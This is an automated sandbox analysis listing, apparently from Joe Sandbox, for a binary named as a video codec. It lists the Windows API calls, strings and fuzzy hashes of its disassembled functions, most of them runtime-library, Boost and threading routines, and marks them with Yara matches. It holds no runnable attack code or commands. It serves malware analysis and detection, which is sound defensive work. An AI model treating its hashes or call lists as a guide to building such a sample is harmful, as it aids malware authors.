                                                                                                      • std::exception::exception.LIBCMT ref: 02BD195F
                                                                                                        • Part of subcall function 02BD24B3: std::exception::_Copy_str.LIBCMT ref: 02BD24CC
                                                                                                        • Part of subcall function 02BD0D30: __CxxThrowException@8.LIBCMT ref: 02BD0D8E
                                                                                                      • std::exception::exception.LIBCMT ref: 02BD19BE
                                                                                                      Strings
                                                                                                      • boost unique_lock has no mutex, xrefs: 02BD194E
                                                                                                      • boost unique_lock owns already the mutex, xrefs: 02BD19AD
                                                                                                      • $, xrefs: 02BD19C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                      • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                      • API String ID: 2140441600-46888669
                                                                                                      • Opcode ID: 9a8cccc288ead1d49ad1386fdaf8669c6383d27eeb0e3e7e01af88dd9edb1470
                                                                                                      • Instruction ID: d553e64c6f2408d3beda856df436d7c4684d10847873ac824ee50a0e2aa1c9f9
                                                                                                      • Opcode Fuzzy Hash: 9a8cccc288ead1d49ad1386fdaf8669c6383d27eeb0e3e7e01af88dd9edb1470
                                                                                                      • Instruction Fuzzy Hash: DA21F7B15187809FD720DF24C55479BBBE5AB88708F404E9EF5A687250E7B99408CF92
                                                                                                      APIs
                                                                                                      • __getptd_noexit.LIBCMT ref: 02BD4A60
                                                                                                        • Part of subcall function 02BD5C52: GetLastError.KERNEL32(75920A60,7591F550,02BD5E40,02BD3013,7591F550,?,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5C54
                                                                                                        • Part of subcall function 02BD5C52: __calloc_crt.LIBCMT ref: 02BD5C75
                                                                                                        • Part of subcall function 02BD5C52: __initptd.LIBCMT ref: 02BD5C97
                                                                                                        • Part of subcall function 02BD5C52: GetCurrentThreadId.KERNEL32 ref: 02BD5C9E
                                                                                                        • Part of subcall function 02BD5C52: SetLastError.KERNEL32(00000000,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5CB6
                                                                                                      • __calloc_crt.LIBCMT ref: 02BD4A83
                                                                                                      • __get_sys_err_msg.LIBCMT ref: 02BD4AA1
                                                                                                      • __invoke_watson.LIBCMT ref: 02BD4ABE
                                                                                                      Strings
                                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02BD4A6B, 02BD4A91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                      • API String ID: 109275364-798102604
                                                                                                      • Opcode ID: 7bb36bbb6e6488bfc383ef3f4d48deb2516252cdc9933653cf64e496cb2ea453
                                                                                                      • Instruction ID: c9762ef618dbb3f87351b189288191498eb35fa1963e09b9dee193624d74b0e4
                                                                                                      • Opcode Fuzzy Hash: 7bb36bbb6e6488bfc383ef3f4d48deb2516252cdc9933653cf64e496cb2ea453
                                                                                                      • Instruction Fuzzy Hash: 0AF0E932500B156BEB31A66A9C406EB72EDDF407A1B4104E6F96D96201FB31DC006698
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
                                                                                                      • GetLastError.KERNEL32 ref: 02BC237A
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                      • String ID: pqcs
                                                                                                      • API String ID: 1619523792-2559862021
                                                                                                      • Opcode ID: 3b95c86ce18cca032a65fc24aee5655aab886a0cfdee87137ebda991ba91978c
                                                                                                      • Instruction ID: 079e68f0a731e35f985f0983e880eae565d89e90af837a305c5e26f7b3812235
                                                                                                      • Opcode Fuzzy Hash: 3b95c86ce18cca032a65fc24aee5655aab886a0cfdee87137ebda991ba91978c
                                                                                                      • Instruction Fuzzy Hash: 88F03071940304AFDF20AF74A809BABBBACEB80741F1045AAEC06D7141EB7099149B91
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4035
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC4042
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC4049
                                                                                                      • std::exception::exception.LIBCMT ref: 02BC4063
                                                                                                        • Part of subcall function 02BCA6A0: __EH_prolog.LIBCMT ref: 02BCA6A5
                                                                                                        • Part of subcall function 02BCA6A0: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA6B4
                                                                                                        • Part of subcall function 02BCA6A0: __CxxThrowException@8.LIBCMT ref: 02BCA6D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 3112922283-2104205924
                                                                                                      • Opcode ID: 76ebbf540c02a5cbd7b2305a3e779d2339f48fca082241a007bd2a7878711dc0
                                                                                                      • Instruction ID: 5869904e481d8fc8f2f0e9e2a9e82b0c4ec66e20561d6307164401ae531bde26
                                                                                                      • Opcode Fuzzy Hash: 76ebbf540c02a5cbd7b2305a3e779d2339f48fca082241a007bd2a7878711dc0
                                                                                                      • Instruction Fuzzy Hash: F6F08CB2E40209EBDF10EFE0D818BFFBB79EB04704F4045D9E916A6681DB7452158F91
                                                                                                      APIs
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403D2D
                                                                                                      • GetFileType.KERNEL32(00000800), ref: 00403DD3
                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00403E2C
                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00403E3A
                                                                                                      • SetHandleCount.KERNEL32 ref: 00403E71
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 1710529072-0
                                                                                                      • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                                      • Instruction ID: 0b7b95883a4e689196e32d1b42849a04f4efe08137134e81777c7f486c9ce5ca
                                                                                                      • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                                      • Instruction Fuzzy Hash: 025125716046458BD7218F38CE847667FA8AF11722F15437AE4A2FB3E0C7389A45CB8D
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD1A30: CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD1A81
                                                                                                        • Part of subcall function 02BD1A30: WaitForSingleObject.KERNEL32(?,000000FF,C802D0CE,?,?,?,?,C802D0CE,02BD1A03,C802D0CE), ref: 02BD1A98
                                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD1CFE
                                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02BD1D1E
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02BD1D57
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02BD1DAB
                                                                                                      • SetEvent.KERNEL32(?), ref: 02BD1DB2
                                                                                                        • Part of subcall function 02BC418C: CloseHandle.KERNEL32(00000000,?,02BD1CE5), ref: 02BC41B0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 4166353394-0
                                                                                                      • Opcode ID: 1f9f43ea0ce04f1be4ad0ea1106975c8eacc1797db9739c4912cd424e8b26feb
                                                                                                      • Instruction ID: 445d0673f4abcec9c5d75116675c209aa1839a1a71c8f7f163c386191be05686
                                                                                                      • Opcode Fuzzy Hash: 1f9f43ea0ce04f1be4ad0ea1106975c8eacc1797db9739c4912cd424e8b26feb
                                                                                                      • Instruction Fuzzy Hash: 4E41EF716103118BEF259F2CCC80BABB7A4EF45724F2446E8EC1ADB395E734D8118BA5
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611172436-0
                                                                                                      • Opcode ID: 84be0ce62303c069eb01cc2b90f6a3e36305656fde87ca3fdbe23e95e5bc0d72
                                                                                                      • Instruction ID: f67d19c458c68778da99b55002a47f268843c190f4ed3fb0ec0cad18fe898db9
                                                                                                      • Opcode Fuzzy Hash: 84be0ce62303c069eb01cc2b90f6a3e36305656fde87ca3fdbe23e95e5bc0d72
                                                                                                      • Instruction Fuzzy Hash: 64319C72504701AFC711DF25C884A6BB7F9FFC8664F200A5EF89683650DB30E946CB91
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE0D3
                                                                                                        • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCE152
• RtlEnterCriticalSection.NTDLL(?), ref: 02BCE16E
• InterlockedIncrement.KERNEL32(02BF5190), ref: 02BCE193
• RtlLeaveCriticalSection.NTDLL(?), ref: 02BCE1A8
  • Part of subcall function 02BC27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02BC284E
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
• String ID:
• API String ID: 1578506061-0
• Opcode ID: f45c17a1078bebe24e4dd5d0cb6a8c285b3c204ce578da111b01174e555ac6c7
• Instruction ID: a1de0de4106a33046c99d63601f9540c75d71ef70914b3f56d95885d25f16a63
• Opcode Fuzzy Hash: f45c17a1078bebe24e4dd5d0cb6a8c285b3c204ce578da111b01174e555ac6c7
• Instruction Fuzzy Hash: 013128B1901245DFDB10DF68D5446AEBBF8FF08310F14859EE44AE7641E774A615CFA0
APIs
• _malloc.LIBCMT ref: 02BE0390
  • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
  • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
  • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
• _free.LIBCMT ref: 02BE03A3
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
• Opcode ID: 0c4275cf0c5f9ca24ae9b22ab0685de15f3c56dbe7ce9e444656795deb116d96
• Instruction ID: 477a662973d38b2b6463bdb0c50a6ad8e15b776f831955eb0bd2f75da260d034
• Opcode Fuzzy Hash: 0c4275cf0c5f9ca24ae9b22ab0685de15f3c56dbe7ce9e444656795deb116d96
• Instruction Fuzzy Hash: FC11C672948711ABDF313F70A8447DA3B9ADF083A1B108DE5E94BAB140EF70C4919B90
APIs
• __EH_prolog.LIBCMT ref: 02BC21DA
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21ED
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02BC2224
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02BC2237
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02BC2261
  • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
  • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
  • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
  • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
• String ID:
• API String ID: 1856819132-0
• Opcode ID: 54856e85d4f2640f44cc34c6e21955d844053808f33cbf27423b35b569689ad0
• Instruction ID: 28cae3f67f23bcf2bc9b7e8afb96cc15847e74b73801f83e4f1338e87f789420
• Opcode Fuzzy Hash: 54856e85d4f2640f44cc34c6e21955d844053808f33cbf27423b35b569689ad0
• Instruction Fuzzy Hash: A9117F72D40114EBCF11EFA8D804AAEFFBAFB44350F10459EE85597260DB714661EF90
APIs
• __EH_prolog.LIBCMT ref: 02BC229D
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC22B0
• TlsGetValue.KERNEL32 ref: 02BC22E7
• TlsSetValue.KERNEL32(?), ref: 02BC2300
• TlsSetValue.KERNEL32(?,?,?), ref: 02BC231C
  • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2350
  • Part of subcall function 02BC2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2360
  • Part of subcall function 02BC2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BC2370
  • Part of subcall function 02BC2341: GetLastError.KERNEL32 ref: 02BC237A
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
• String ID:
• API String ID: 1856819132-0
• Opcode ID: eb8ba08a4340594e6f123d5562401caf34461e2c5030efc34b956587c4ef34a1
• Instruction ID: fb70a5ef67b95d18161945328ee71319d558e93c9763f353bf093ef507ec38a2
• Opcode Fuzzy Hash: eb8ba08a4340594e6f123d5562401caf34461e2c5030efc34b956587c4ef34a1
• Instruction Fuzzy Hash: 1B115E72D00118EBCF12EFA8D8449AEFFBAEF44350F10459EE815A3211DB714A61DF90
APIs
  • Part of subcall function 02BCB13B: __EH_prolog.LIBCMT ref: 02BCB140
• __CxxThrowException@8.LIBCMT ref: 02BCBD05
  • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02BF1DB4,?,00000001), ref: 02BCBD1B
• InterlockedExchange.KERNEL32(?,00000001), ref: 02BCBD2E
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02BF1DB4,?,00000001), ref: 02BCBD3E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCBD4C
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
• String ID:
• API String ID: 2725315915-0
• Opcode ID: b415c222c890962fd3b9f960514aa40bceb996725e74948e3888f758bd677a48
• Instruction ID: 21a301c1e70ff7d413f6dff43684362fc848972c0551406c78a4b585c2b79240
• Opcode Fuzzy Hash: b415c222c890962fd3b9f960514aa40bceb996725e74948e3888f758bd677a48
• Instruction Fuzzy Hash: BE018676A40205AFDF10EBA4DC89F8AB7BDEB04369F104958F625DB190DB60E9449B10
APIs
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
• RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
• InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
• RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
• String ID:
• API String ID: 747265849-0
• Opcode ID: b3c882eff7febc32f64d6e9a1f0f06b795f7ba390f83c6bc407dd49e0e0dac49
• Instruction ID: 0e89ef1cd546f2b90ea171935eb87eadc731c579a428668bf462fade831762ac
• Opcode Fuzzy Hash: b3c882eff7febc32f64d6e9a1f0f06b795f7ba390f83c6bc407dd49e0e0dac49
• Instruction Fuzzy Hash: 58F03072640205BBDB109AA0ED49FD6B72CFB44751F904455F701DB481DB71AA21DBA1
APIs
• InterlockedIncrement.KERNEL32(?), ref: 02BC1ED2
• PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02BC1EEA
• RtlEnterCriticalSection.NTDLL(?), ref: 02BC1EF9
• InterlockedExchange.KERNEL32(?,00000001), ref: 02BC1F0E
• RtlLeaveCriticalSection.NTDLL(?), ref: 02BC1F15
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
• String ID:
• API String ID: 830998967-0
• Opcode ID: a37bd0682b8817fc7773a6be6c26841c4ebe206b6672563458e70861df633b5f
• Instruction ID: f878844eb9d962ceaf8868d3f561576c17758c7cf092c439618fe2992e6eb0d4
• Opcode Fuzzy Hash: a37bd0682b8817fc7773a6be6c26841c4ebe206b6672563458e70861df633b5f
• Instruction Fuzzy Hash: DCF03A72641605FBDB00AFA5ED88FD6BB2DFF48391F000416F6019B442DB71AA25DBE0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
• Opcode ID: 02d52752bcf22325dcd0420dc0fe718f3c24d51bada9543bdc54c63434ff0002
• Instruction ID: 1707fd5ff5a809d915dfe1d6b6248b5a91275c3342642d0aa60ab9a14d096e91
• Opcode Fuzzy Hash: 02d52752bcf22325dcd0420dc0fe718f3c24d51bada9543bdc54c63434ff0002
• Instruction Fuzzy Hash: 2D41B5313003049BD7359E69DC94E66BBAAEF40754B2009BEE956CB781DB70F944CB91
APIs
• WSASetLastError.WS2_32(00000000), ref: 02BC30C3
• WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02BC3102
• _memcmp.LIBCMT ref: 02BC3141
Strings
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastString_memcmp
• String ID: 255.255.255.255
• API String ID: 1618111833-2422070025
• Opcode ID: 6031fec98fc083101f0a3116bfd565b81b7ec5261d101576bdc73673703bc0b8
• Instruction ID: 9ed4f49ceae60202d85d6d5b4999d22cf59500d5ab123bd0665676c99d02c725
• Opcode Fuzzy Hash: 6031fec98fc083101f0a3116bfd565b81b7ec5261d101576bdc73673703bc0b8
• Instruction Fuzzy Hash: 4731B571A003559FDB20AF64C880BAEB7E5EF45324F6089EDED655B380EB719981CF90
APIs
• __EH_prolog.LIBCMT ref: 02BCCC8A
  • Part of subcall function 02BCD266: std::exception::exception.LIBCMT ref: 02BCD295
  • Part of subcall function 02BCDA1C: __EH_prolog.LIBCMT ref: 02BCDA21
  • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
  • Part of subcall function 02BCD2C5: __EH_prolog.LIBCMT ref: 02BCD2CA
Strings
• @P~, xrefs: 02BCCCB6, 02BCCD46
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02BCCCC0
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCCCC7
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: @P~$C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-4153709165
• Opcode ID: a4dbe3905cbc7fef157ec03e21e57ff0515e1360088a09037fe8ba67f25f135b
• Instruction ID: e140d3b4a8363c51d56026f3d8c3b10e18a30960256c7a994b5ed56d9849ccfb
• Opcode Fuzzy Hash: a4dbe3905cbc7fef157ec03e21e57ff0515e1360088a09037fe8ba67f25f135b
• Instruction Fuzzy Hash: E221AD71E002489AEB04EFA8D854AEDBFB5EF14300F1444DDE946AB280DB709A44CF51
APIs
• __EH_prolog.LIBCMT ref: 02BCCD7F
  • Part of subcall function 02BCD33D: std::exception::exception.LIBCMT ref: 02BCD36A
  • Part of subcall function 02BCDB53: __EH_prolog.LIBCMT ref: 02BCDB58
  • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
  • Part of subcall function 02BCD39A: __EH_prolog.LIBCMT ref: 02BCD39F
Strings
• P~, xrefs: 02BCCDAB, 02BCCE3B
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02BCCDB5
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCCDBC
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)$P~
• API String ID: 1953324306-3742533756
• Opcode ID: 5634b7a20db9ab919b449d280acdfe23a58f88c1a5957ac71bf4616ba8a3572a
• Instruction ID: cdf161ebc03c13b03be6c1e50cda60897533caea2389a6f89a8db20350744c8e
• Opcode Fuzzy Hash: 5634b7a20db9ab919b449d280acdfe23a58f88c1a5957ac71bf4616ba8a3572a
• Instruction Fuzzy Hash: 4921CCB5E002089BDB08EFA8D550BEEBBB5EF55300F2045DDE906AB240DB706A44CF91
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC1F5B
                                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02BC1FC5
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 02BC1FD2
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                      • String ID: iocp
                                                                                                      • API String ID: 998023749-976528080
                                                                                                      • Opcode ID: 2827cf37d741ef62fbaf0c25e3eb94c4dbc094678fbd580222b7a14c667a55a4
                                                                                                      • Instruction ID: c3cb22a90284a2a88115a85a7b189832337245e4cac91597385aa7ead715bba6
                                                                                                      • Opcode Fuzzy Hash: 2827cf37d741ef62fbaf0c25e3eb94c4dbc094678fbd580222b7a14c667a55a4
                                                                                                      • Instruction Fuzzy Hash: A021A2B1901B449FCB20DF6AC54455AFBF8EF94720B108A5FA4A697A50D7B0A6048F91
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 02BD3B44
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • std::exception::exception.LIBCMT ref: 02BD3B62
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BD3B77
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
